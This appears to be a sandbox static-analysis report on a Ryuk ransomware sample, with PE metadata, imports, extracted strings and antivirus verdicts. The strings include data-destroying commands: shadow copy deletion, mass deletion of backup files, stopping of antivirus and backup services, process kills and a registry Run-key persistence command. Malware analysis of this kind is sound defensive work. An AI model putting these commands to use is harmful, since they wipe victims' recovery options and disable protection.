Static | ZeroBOX

PE Compile Time

2018-08-14 20:46:26

PDB Path

C:\Users\Admin\Documents\Visual Studio 2015\Projects From Ryuk\ConsoleApplication54\x64\Release\ConsoleApplication54.pdb

PE Imphash

3d84250cdbe08a9921b4fb008881914b

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000161f0 0x00016200 6.44257509423
.rdata 0x00018000 0x0000b700 0x0000b800 5.4071073938
.data 0x00024000 0x0000c2f8 0x00007200 4.02534148509
.pdata 0x00031000 0x000011f4 0x00001200 5.19458412891
.gfids 0x00033000 0x000000a8 0x00000200 1.43907690073
.rsrc 0x00034000 0x000001e0 0x00000200 4.71767883295
.reloc 0x00035000 0x00000610 0x00000800 4.74876628255

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00034060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x140018048 OpenProcess
0x140018050 CreateToolhelp32Snapshot
0x140018058 Sleep
0x140018060 GetLastError
0x140018068 Process32NextW
0x140018070 GetCurrentThread
0x140018078 LoadLibraryA
0x140018080 GlobalAlloc
0x140018088 DeleteFileW
0x140018090 Process32FirstW
0x140018098 GetModuleHandleA
0x1400180a0 CloseHandle
0x1400180a8 HeapAlloc
0x1400180b0 GetWindowsDirectoryW
0x1400180b8 GetProcAddress
0x1400180c0 VirtualAllocEx
0x1400180c8 LocalFree
0x1400180d0 GetProcessHeap
0x1400180d8 FreeLibrary
0x1400180e0 CreateRemoteThread
0x1400180e8 VirtualFreeEx
0x1400180f0 GetVersionExW
0x1400180f8 CreateFileW
0x140018100 GetModuleFileNameW
0x140018108 GetCurrentProcess
0x140018110 GetCommandLineW
0x140018118 SetLastError
0x140018120 HeapFree
0x140018128 GlobalFree
0x140018130 WriteConsoleW
0x140018138 SetFilePointerEx
0x140018140 HeapReAlloc
0x140018148 HeapSize
0x140018150 RtlCaptureContext
0x140018158 RtlLookupFunctionEntry
0x140018160 RtlVirtualUnwind
0x140018168 UnhandledExceptionFilter
0x140018178 TerminateProcess
0x140018188 QueryPerformanceCounter
0x140018190 GetCurrentProcessId
0x140018198 GetCurrentThreadId
0x1400181a0 GetSystemTimeAsFileTime
0x1400181a8 InitializeSListHead
0x1400181b0 IsDebuggerPresent
0x1400181b8 GetStartupInfoW
0x1400181c0 GetModuleHandleW
0x1400181c8 RtlUnwindEx
0x1400181d0 RaiseException
0x1400181e0 TlsAlloc
0x1400181e8 TlsGetValue
0x1400181f0 TlsSetValue
0x1400181f8 TlsFree
0x140018200 LoadLibraryExW
0x140018208 EnterCriticalSection
0x140018210 LeaveCriticalSection
0x140018218 DeleteCriticalSection
0x140018220 ExitProcess
0x140018228 GetModuleHandleExW
0x140018230 GetStdHandle
0x140018238 WriteFile
0x140018240 GetModuleFileNameA
0x140018248 MultiByteToWideChar
0x140018250 WideCharToMultiByte
0x140018258 GetACP
0x140018260 LCMapStringW
0x140018268 GetFileType
0x140018270 FindClose
0x140018278 FindFirstFileExA
0x140018280 FindNextFileA
0x140018288 IsValidCodePage
0x140018290 GetOEMCP
0x140018298 GetCPInfo
0x1400182a0 GetCommandLineA
0x1400182a8 GetEnvironmentStringsW
0x1400182b0 FreeEnvironmentStringsW
0x1400182b8 SetStdHandle
0x1400182c0 GetStringTypeW
0x1400182c8 FlushFileBuffers
0x1400182d0 GetConsoleCP
0x1400182d8 GetConsoleMode
0x1400182e0 WriteProcessMemory
Library ADVAPI32.dll:
0x140018000 SystemFunction036
0x140018008 LookupPrivilegeValueW
0x140018010 AdjustTokenPrivileges
0x140018018 ImpersonateSelf
0x140018020 OpenProcessToken
0x140018028 OpenThreadToken
0x140018030 LookupAccountSidW
0x140018038 GetTokenInformation
Library SHELL32.dll:
0x1400182f0 CommandLineToArgvW
0x1400182f8 ShellExecuteW
0x140018300 ShellExecuteA

!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.gfids
@.rsrc
@.reloc
x ATAVAWH
@A_A^A\
L$ SVWH
\$DtXH
WATAUAVAW
fD9,Hu
A_A^A]A\_
|$ UATAUAVAWH
A_A^A]A\]
uRfD95
NfD95u
fD9T$Jt
fD9T$Jt
f9t$Jt
@USAVH
f9\$Bt
@USWAVH
L9d$Xu
|$h@KL
D$xHERMf
D$|ES@
|$T@8}
|$h@KL
@USVWH
fB9DD|u
fB9DD|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
fB9DD|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
fB9DD|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9\$~t
UATAUAVAWH
A_A^A]A\]
UATAUAVAWH
t$xf9u
A_A^A]A\]
UAVAWH
H3E H3E
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
u3HcH<H
D$@H;G
S,, <Zw
CA< t(<#t
<htr<jtb<lt6<tt&<wt
!,X< w
t$ WAVAWH
s4+sP+
0A_A^_
WAVAWH
A_A^_
@8|$Pt
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
A86taH
0A_A^_
L$ WATAUAVAWH
@A_A^A]A\_
x ATAVAWH
A_A^A\
|$ UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
WAVAWH
@A_A^_
fD9t$b
D82u&H
D8t$Ht
x ATAVAWH
gfffffffH
D8d$ht
A_A^A\
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
`A_A^A]A\_^]
x ATAVAWH
0A_A^A\
\$ UVWAVAWH
A_A^_^]
@8|$^t
l$ VWATAVAWH
L$&@8t$&t0@8q
A81t@@8r
A_A^A\_^
fD94Fu
@UATAUAVAWH
e0A_A^A]A\]
SVWATAUAWH
HA_A]A\_^[
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ E
`A_A^A]A\_^]
@UATAUAVAWH
H!T$0D
uf!T$(H!T$
A_A^A]A\]
@USVWATAUAVAWH
D8l$ht
A_A^A]A\_^[]
l$ WAVAWH
A_A^_
@UATAVH
WATAUAVAWH
A_A^A]A\_
ffffff
fffffff
|$ ATAVAWH
\$@@8=!
A_A^A\
USVWAVH
A^_^[]
LcA<E3
Main Invoked.
Main Returned.
EventRegister
EventSetInformation
EventUnregister
EventWriteTransfer
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
`h````
xpxxxx
(null)
GetCurrentPackageId
LCMapStringEx
LocaleNameToLCID
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
taskkill
LookupPrivilegeValue error: %u
AdjustTokenPrivileges error: %u
The token does not have the specified privilege.
Iphlpapi.dll
GetLastError
GetSystemDefaultLangID
WaitForMultipleObjects
GetFileSizeEx
MoveFileExW
SetFilePointerEx
CreateThread
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
kernel32.dll
IsWow64Process
AamRlebaQnPcrdUQxfhhMSyJVzJEQzLgXzEwnmOhTfTNJqEwddvoCIwCjcgmSoqCKoSdcCKfRuzzsCLwEgXFJVCqmHxSBLWemHjvKtyLPNZFsy
QGDWqAqQzuTgzpJePKdAcDauoXPOTKYZQSFKBsJYKUYLhAQOiQFdulTFKqvyiMwOIzzTjhuNbJVzaxSOtnNzbqNDUWUKVuSejHjMyOVTzsKKFiZHcXmvDFBPLbyknfMKQAfymCrJmtgKnlujwDwdohjBsumNHZSueZRNntZOoyNJwTVmevyjoGiYIbSJzfZIKHqvuUsoeppbSAZtFdNeyTXzDLUvJeOhJMyCVSGrPpFjvxUXXKAeIRdiiDcDVTOAIVSeSCYNxfjuUvtNZbSEfAUHGkITnkpaQrxFTlwfPMEivWOcVCvdusvzFOjQrKpSCECJYRYbVyhpsoWbLnBsmtmzBXaJoubAWkLzANMQORitgpuHCQarSKqWfVXkwSeRwKmcLDLxKVFHJWRxYOeWyrMVrxXUuBfZZeJVaKAFeMfVOpDXlorbDIMfkftnvSWKvmrZNBJxBpIjQvPGuRwiiPIXFKqArwiagkvOofSJZXddcbDvNcHRKzXPRsdhqWpEbCxgQaacjWqnYddyiHydMSNbraTjZycQDIVnlRkVzslsAXxyDdqfUCjcogfvAsHqNabVOnniERkEYvWkIOmjTDOKFefYpgWBmyYKLKBHsvnTloJoVXGflyVQcmEGaUdQSQnKEbxjbDDQerdgiepBqNNJpoXxyxWGDPxkfAvlMqXcIYThFCkupJvKxekBiCvXznRXALgmdEceCrVVClEAfBioHYSmRVKnvqtOvKnUUTlTJdgkzYEdgwYbIAJKSSRbGbjQKIHgRsCTjshfHkFFeDjLFtnhKHKfZOfQjvFcElnXfKaZkuszzFVYqzjenOsHKPMmSUCfyPinOZDWeuUvAZLcxIvIGFKwsshMNHIQmnOPXSoqgoDsSwtlAnFFmbkhrQlDiAbnEbvsdIvnBVoMPXlOgZOYbrVbMWotnAynsqoxAHcsgODsshtXAcmMQzwgVOBbXkPMDdqUKYkdWdCSVuDpPPsLIosPCDmjKFekEVkYYNxtwAyTLwXtXKxQgiWy
InvokeMainViaCRT
"Main Invoked."
FileName
ExitMainViaCRT
"Main Returned."
FileName
Microsoft.CRTProvider
C:\Users\Admin\Documents\Visual Studio 2015\Projects From Ryuk\ConsoleApplication54\x64\Release\ConsoleApplication54.pdb
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.idata$2
.idata$3
.idata$4
.idata$6
.pdata
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
WriteProcessMemory
HeapFree
SetLastError
GetCommandLineW
GetCurrentProcess
GetModuleFileNameW
CreateFileW
GetVersionExW
GetModuleHandleA
OpenProcess
CreateToolhelp32Snapshot
GetLastError
Process32NextW
GetCurrentThread
LoadLibraryA
GlobalAlloc
DeleteFileW
Process32FirstW
GlobalFree
CloseHandle
HeapAlloc
GetWindowsDirectoryW
GetProcAddress
VirtualAllocEx
LocalFree
GetProcessHeap
FreeLibrary
CreateRemoteThread
VirtualFreeEx
KERNEL32.dll
GetTokenInformation
LookupAccountSidW
OpenThreadToken
OpenProcessToken
ImpersonateSelf
AdjustTokenPrivileges
LookupPrivilegeValueW
ADVAPI32.dll
ShellExecuteW
CommandLineToArgvW
ShellExecuteA
SHELL32.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
RaiseException
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
ExitProcess
GetModuleHandleExW
GetStdHandle
WriteFile
GetModuleFileNameA
MultiByteToWideChar
WideCharToMultiByte
GetACP
LCMapStringW
GetFileType
FindClose
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCPInfo
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
HeapSize
HeapReAlloc
SetFilePointerEx
WriteConsoleW
SystemFunction036
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
cies\System\
$3P61"
w&J;<=d
stop "Acronis VSS Provider" /y
stop "Enterprise Client Service" /y
stop "Sophos Agent" /y
stop "Sophos AutoUpdate Service" /y
stop "Sophos Clean Service" /y
stop "Sophos Device Control Service" /y
stop "Sophos File Scanner Service" /y
stop "Sophos Health Service" /y
stop "Sophos MCS Agent" /y
stop "Sophos MCS Client" /y
stop "Sophos Message Router" /y
stop "Sophos Safestore Service" /y
stop "Sophos System Protection Service" /y
stop "Sophos Web Control Service" /y
stop "SQLsafe Backup Service" /y
stop "SQLsafe Filter Service" /y
stop "Symantec System Recovery" /y
stop "Veeam Backup Catalog Data Service" /y
stop AcronisAgent /y
stop AcrSch2Svc /y
stop Antivirus /y
stop ARSM /y
stop BackupExecAgentAccelerator /y
stop BackupExecAgentBrowser /y
stop BackupExecDeviceMediaService /y
stop BackupExecJobEngine /y
stop BackupExecManagementService /y
stop BackupExecRPCService /y
stop BackupExecVSSProvider /y
stop bedbg /y
stop DCAgent /y
stop EPSecurityService /y
stop EPUpdateService /y
stop EraserSvc11710 /y
stop EsgShKernel /y
stop FA_Scheduler /y
stop IISAdmin /y
stop IMAP4Svc /y
stop macmnsvc /y
stop masvc /y
stop MBAMService /y
stop MBEndpointAgent /y
stop McAfeeEngineService /y
stop McAfeeFramework /y
stop McAfeeFrameworkMcAfeeFramework /y
stop McShield /y
stop McTaskManager /y
stop mfemms /y
stop mfevtp /y
stop MMS /y
stop mozyprobackup /y
stop MsDtsServer /y
stop MsDtsServer100 /y
stop MsDtsServer110 /y
stop MSExchangeES /y
stop MSExchangeIS /y
stop MSExchangeMGMT /y
stop MSExchangeMTA /y
stop MSExchangeSA /y
stop MSExchangeSRS /y
stop MSOLAP$SQL_2008 /y
stop MSOLAP$SYSTEM_BGC /y
stop MSOLAP$TPS /y
stop MSOLAP$TPSAMA /y
stop MSSQL$BKUPEXEC /y
stop MSSQL$ECWDB2 /y
stop MSSQL$PRACTICEMGT /y
stop MSSQL$PRACTTICEBGC /y
stop MSSQL$PROFXENGAGEMENT /y
stop MSSQL$SBSMONITORING /y
stop MSSQL$SHAREPOINT /y
stop MSSQL$SQL_2008 /y
stop MSSQL$SYSTEM_BGC /y
stop MSSQL$TPS /y
stop MSSQL$TPSAMA /y
stop MSSQL$VEEAMSQL2008R2 /y
stop MSSQL$VEEAMSQL2012 /y
stop MSSQLFDLauncher /y
stop MSSQLFDLauncher$PROFXENGAGEMENT /y
stop MSSQLFDLauncher$SBSMONITORING /y
stop MSSQLFDLauncher$SHAREPOINT /y
stop MSSQLFDLauncher$SQL_2008 /y
stop MSSQLFDLauncher$SYSTEM_BGC /y
stop MSSQLFDLauncher$TPS /y
stop MSSQLFDLauncher$TPSAMA /y
stop MSSQLSERVER /y
stop MSSQLServerADHelper100 /y
stop MSSQLServerOLAPService /y
stop MySQL80 /y
stop MySQL57 /y
stop ntrtscan /y
stop OracleClientCache80 /y
stop PDVFSService /y
stop POP3Svc /y
stop ReportServer /y
stop ReportServer$SQL_2008 /y
stop ReportServer$SYSTEM_BGC /y
stop ReportServer$TPS /y
stop ReportServer$TPSAMA /y
stop RESvc /y
stop sacsvr /y
stop SamSs /y
stop SAVAdminService /y
stop SAVService /y
stop SDRSVC /y
stop SepMasterService /y
stop ShMonitor /y
stop Smcinst /y
stop SmcService /y
stop SMTPSvc /y
stop SNAC /y
stop SntpService /y
stop sophossps /y
stop SQLAgent$BKUPEXEC /y
stop SQLAgent$ECWDB2 /y
stop SQLAgent$PRACTTICEBGC /y
stop SQLAgent$PRACTTICEMGT /y
stop SQLAgent$PROFXENGAGEMENT /y
stop SQLAgent$SBSMONITORING /y
stop SQLAgent$SHAREPOINT /y
stop SQLAgent$SQL_2008 /y
stop SQLAgent$SYSTEM_BGC /y
stop SQLAgent$TPS /y
stop SQLAgent$TPSAMA /y
stop SQLAgent$VEEAMSQL2008R2 /y
stop SQLAgent$VEEAMSQL2012 /y
stop SQLBrowser /y
stop SQLSafeOLRService /y
stop SQLSERVERAGENT /y
stop SQLTELEMETRY /y
stop SQLTELEMETRY$ECWDB2 /y
stop SQLWriter /y
stop SstpSvc /y
stop svcGenericHost /y
stop swi_filter /y
stop swi_service /y
stop swi_update_64 /y
stop TmCCSF /y
stop tmlisten /y
stop TrueKey /y
stop TrueKeyScheduler /y
stop TrueKeyServiceHelper /y
stop UI0Detect /y
stop VeeamBackupSvc /y
stop VeeamBrokerSvc /y
stop VeeamCatalogSvc /y
stop VeeamCloudSvc /y
stop VeeamDeploymentService /y
stop VeeamDeploySvc /y
stop VeeamEnterpriseManagerSvc /y
stop VeeamMountSvc /y
stop VeeamNFSSvc /y
stop VeeamRESTSvc /y
stop VeeamTransportSvc /y
stop W3Svc /y
stop wbengine /y
stop WRSVC /y
stop MSSQL$VEEAMSQL2008R2 /y
stop SQLAgent$VEEAMSQL2008R2 /y
stop VeeamHvIntegrationSvc /y
stop swi_update /y
stop SQLAgent$CXDB /y
stop SQLAgent$CITRIX_METAFRAME /y
stop "SQL Backups" /y
stop MSSQL$PROD /y
stop "Zoolz 2 Service" /y
stop MSSQLServerADHelper /y
stop SQLAgent$PROD /y
stop msftesql$PROD /y
stop NetMsmqActivator /y
stop EhttpSrv /y
stop ekrn /y
stop ESHASRV /y
stop MSSQL$SOPHOS /y
stop SQLAgent$SOPHOS /y
stop AVP /y
stop klnagent /y
stop MSSQL$SQLEXPRESS /y
stop SQLAgent$SQLEXPRESS /y
stop wbengine /y
stop kavfsslp /y
stop KAVFSGT /y
stop KAVFS /y
stop mfefire /y
55>_e0??
55>_e&3:
=&( 4
%%?'"4
6,ZcL>%
A(]}v=9
sQlQ]Z
MEou"w
%BxkIs
+#o=8y;%s5.0
%,8u+%
-1'>!2v
,88-Y
*11=.<%s
&-2=Vk`!=
B6>$Z5&(q<&
<!`dGNvX
6P&#V#7
YIlmf|
/acddO
,9l-+$
.cYXCj
>=2ljgL
#00L5$
:a9#<&>
0(5!M =&
#EN*.'yL\{VLP
N69O*5,L;
>)S%'O
vFr\m08
0I*1-.6G5,:
on^`Zf:
6&:tczP%6T4
L4' +<
%,meo+ )y
,+7FLrJB
y9,4&A
(<kU|Cg
g0*67K
0!5 7odPEl=g
&6cs6 m
1$v6,-j
7#<t?,
w(!14w
$'+5Q
<j-1:7
23zLt-.%
'ABCoa
BTC wallet:
%BxkIt6
%BxkIt2
No system is safe
/IM zoolz.exe /F
/IM agntsvc.exe /F
/IM dbeng50.exe /F
/IM dbsnmp.exe /F
/IM encsvc.exe /F
/IM excel.exe /F
/IM firefoxconfig.exe /F
/IM infopath.exe /F
/IM isqlplussvc.exe /F
/IM msaccess.exe /F
/IM msftesql.exe /F
/IM mspub.exe /F
/IM mydesktopqos.exe /F
/IM mydesktopservice.exe /F
/IM mysqld.exe /F
/IM mysqld-nt.exe /F
/IM mysqld-opt.exe /F
/IM ocautoupds.exe /F
/IM ocomm.exe /F
/IM ocssd.exe /F
/IM onenote.exe /F
/IM oracle.exe /F
/IM outlook.exe /F
/IM powerpnt.exe /F
/IM sqbcoreservice.exe /F
/IM sqlagent.exe /F
/IM sqlbrowser.exe /F
/IM sqlservr.exe /F
/IM sqlwriter.exe /F
/IM steam.exe /F
/IM synctime.exe /F
/IM tbirdconfig.exe /F
/IM thebat.exe /F
/IM thebat64.exe /F
/IM thunderbird.exe /F
/IM visio.exe /F
/IM winword.exe /F
/IM wordpad.exe /F
/IM xfssvccon.exe /F
/IM tmlisten.exe /F
/IM PccNTMon.exe /F
/IM CNTAoSMgr.exe /F
/IM Ntrtscan.exe /F
/IM mbamtray.exe /F
g*SqM5'T2Xzf
5;T5Xzf
?_>sI~
5;T4Xzf
?_?sI~
g,SqM7(
g/SqM7(
,TeRk
#_<sI~
#_=sI~
g.SqM5'T6Xzf
g!SqM5'T9Xzf
2B9s5{L8(
%B9s5{L8"
*cG{B9s5{L),
6iF"Bu/I~
B>s5{L8(
qM<iF B?s5{L
*cG{B?s53
!HtcI4X
=Bu:I~
?B<s5{L>:
qM)iF7Bu8I6X
:B=s5{L-+
!HtcI6X
%B=s5{L-
2B2s5{L8(
%B2s5{L8"
*cG{B2s5{L),
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
advapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
(null)
api-ms-win-appmodel-runtime-l1-1-1
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l2-1-1
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
user32
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
t\Documents and Settings\Default User\finish
\users\Public\finish
PUBLIC
UNIQUE_ID_DO_NOT_REMOVE
SeDebugPrivilege
csrss.exe
explorer.exe
lsaas.exe
\Documents and Settings\Default User\sys
\users\Public\sys
RyukReadMe.txt
\System32\cmd.exe
\Documents and Settings\Default User\
\users\Public\
keystorage2
/C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "
/reg:64
q2(&8
UNIQUE_ID_DO_NOT_REMOVE
hrmlog
q2(&8
?;Iy2(&
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
ClamAV Win.Ransomware.Ryuk-6688842-0
CMC Clean
CAT-QuickHeal Clean
ALYac Gen:Variant.Ransom.Ryuk.19
Malwarebytes Malware.AI.218522461
VIPRE Trojan.Win32.Generic!BT
AegisLab Clean
Sangfor Win.Ransomware.Ryuk-6688842-0
K7AntiVirus Trojan ( 00553fc91 )
BitDefender Gen:Variant.Ransom.Ryuk.19
K7GW Trojan ( 00553fc91 )
Cybereason malicious.8069d3
Baidu Clean
Cyren W64/Ransom.Ryuk.A.gen!Eldorado
ESET-NOD32 a variant of Win64/Filecoder.T
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Gen:Variant.Ransom.Ryuk.19
Tencent Clean
Ad-Aware Gen:Variant.Ransom.Ryuk.19
Emsisoft Gen:Variant.Ransom.Ryuk.19 (B)
Comodo Clean
F-Secure Heuristic.HEUR/AGEN.1110011
DrWeb Clean
Zillya Trojan.Generic.Win32.644133
TrendMicro Ransom.Win64.RYUK.SM
McAfee-GW-Edition Ransom-Ryuk!8819D7F8069D
MaxSecure Trojan.Malware.121218.susgen
FireEye Generic.mg.8819d7f8069d35e7
Sophos ML/PE-A + Troj/Ransom-FAF
SentinelOne Static AI - Malicious PE
GData Win64.Trojan-Ransom.Ryuk.A
Jiangmin Trojan.Generic.cpxqa
Webroot Clean
Avira HEUR/AGEN.1110011
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Ransom.Ryuk.19
ViRobot Clean
ZoneAlarm Clean
Microsoft Ransom:Win64/Jabaxsta.B
AhnLab-V3 Trojan/Win64.Ryukran.R234901
Acronis Clean
McAfee Ransom-Ryuk!8819D7F8069D
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Ransom.Win64.RYUK.SM
Rising Ransom.Jabaxsta!1.B3AA (CLASSIC)
Yandex Clean
Ikarus Trojan-Ransom.Ryuk
eGambit Clean
Fortinet W64/Ryuk.223E!tr.ransom
BitDefenderTheta Clean
AVG Win64:RansomX-gen [Ransom]
Avast Win64:RansomX-gen [Ransom]
CrowdStrike win/malicious_confidence_60% (D)
Qihoo-360 Clean
No IRMA results available.